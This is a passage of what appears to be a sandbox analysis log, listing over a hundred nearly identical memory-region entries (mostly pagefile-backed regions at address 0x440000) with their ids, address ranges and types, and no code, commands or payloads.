monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 868 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 869 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 870 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 871 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 872 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 873 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 874 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 875 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 876 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 877 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 878 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 879 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 880 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 881 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 882 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 883 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 884 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 885 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 886 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 887 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 888 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 889 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 890 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 891 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 892 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 893 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 894 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 895 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 896 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 897 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 898 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 899 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 900 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 901 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 902 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 903 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 904 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 905 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 906 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 907 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 908 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 909 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 910 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 911 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 912 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 913 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 914 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 915 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 916 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 917 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 918 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 919 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 920 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 921 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 922 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 923 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 924 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 925 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 926 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 927 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 928 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 929 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 930 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 931 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 932 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 933 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 934 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 935 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 936 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 937 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 938 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 939 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 940 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 941 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 942 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 943 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 944 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 945 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 946 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 947 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 948 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 949 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 950 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 951 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 952 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 953 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 954 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 955 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 956 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 957 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 958 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 959 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 960 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 961 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 962 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 963 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 964 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 965 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 966 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 967 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 968 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 969 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 970 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 971 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 972 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 973 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 974 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 975 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 976 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 977 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 978 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 979 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 980 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 981 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 982 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 983 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 984 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 985 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 986 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 987 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 988 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 989 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 990 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 991 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 992 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 993 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 994 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 995 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 996 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 997 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 998 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 999 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1000 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1001 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1002 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1003 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1004 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1005 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1006 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1007 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1008 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1009 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1010 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1011 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1012 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1013 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1014 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1015 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1016 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1017 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1018 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1019 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1020 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1021 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1022 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1023 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1024 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1025 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1026 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1027 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1028 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1029 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1030 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1031 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1032 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1033 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1034 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1035 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1036 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1037 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1038 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1039 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1040 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1041 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1042 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1043 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1044 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1045 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1046 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1047 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1048 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1049 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1050 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1051 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1052 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1053 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1054 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1055 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1056 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1057 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1058 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1059 start_va = 0x440000 end_va = 